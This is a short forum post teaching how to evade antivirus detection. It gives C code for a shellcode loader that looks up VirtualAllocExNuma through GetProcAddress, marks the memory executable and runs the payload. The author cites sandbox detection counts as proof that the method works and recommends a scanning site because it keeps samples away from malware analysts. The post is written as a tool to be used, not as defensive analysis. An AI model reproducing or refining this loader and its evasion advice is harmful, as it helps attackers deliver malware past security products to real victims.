Hey guys, here's my follow up post lel. Today I'm going to show you how to evade analysis using GetProcAddress!
Say for example you are trying to go about loading shellcode into memory... typically you would go about it by using VirtualAlloc, or some other variant. Well, the issue with this is the fact that most AV have caught on to using these memory allocation methods. Most normal, law-abiding programs will never need to call VirtualAlloc, so if they see a program calling it, they are sure to raise the alarms.
By using GetProcAddress, you can call functions in the kernel32.dll without ever directly calling them yourself.
For example:
Code:
typedef int(WINAPI* VirtualAllocProc)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD, DWORD);
unsigned char shellcode[] = "\0xFU\0xCK\0xME";
int main(void){
// Get the address to VirtualAllocExNuma using the already loaded kernel32.dll
VirtualAllocProc VirtualAllocAddr = (VirtualAllocProc)GetProcAddress(GetModuleHandleA("kernel32.dll"), "VirtualAllocExNuma");
// Call VirtualAllocExNuma using the address gotten from GetProcAddress
void* exec = (void*)VirtualAllocAddr(GetCurrentProcess(), NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE, NUMA_NO_PREFERRED_NODE);
// Profit
memcpy(exec, shellcode, sizeof(shellcode));
((void(*)())exec)();
}
To prove my method, I scanned the both of them using
https://www.hybrid-analysis.com/, which is a site like VirusTotal that allows you to upload files without having the service spread your methods to the malware analysts!
Standard method (7/27 w/ Signature Detection evaded):
https://www.hybrid-analysis.com/sample/a...15a3a6f278
GetProcAddress method (2/27 w/ Signature Detection evaded):
https://www.hybrid-analysis.com/sample/5...16929c5e6c
If you have any questions, feel free to reply!
